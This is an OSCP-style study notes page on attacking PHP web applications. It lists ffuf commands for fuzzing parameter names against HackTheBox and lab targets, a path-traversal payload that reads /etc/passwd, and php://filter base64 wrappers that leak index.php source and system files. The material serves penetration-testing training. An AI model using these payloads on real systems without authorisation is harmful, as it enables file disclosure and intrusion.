> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/web-applications/php-applications.md).

# PHP Applications

Fuzz php? parameters

```
ffuf -k -u https://streamio.htb/admin/index.php?FUZZ=id -w burp-parameter-names.txt 
```

`ffuf -u http://192.168.156.209/manage.php?FUZZ=id -H "Cookie: PHPSESSID=i43gfdnnlackkpfp934p9hdh25" -w burp-parameter-names.txt`

#### Fuzzing for DT and LFI

?FUZZ=../../../../../../../../etc/passwd

{% hint style="info" %}
You can add cookies using -H and the cookie header from burp
{% endhint %}

<pre><code><strong>php://filter/convert.base64-encode/resource=index.php
</strong>php://filter/convert.base64-encode/resource=/etc/passwd
</code></pre>
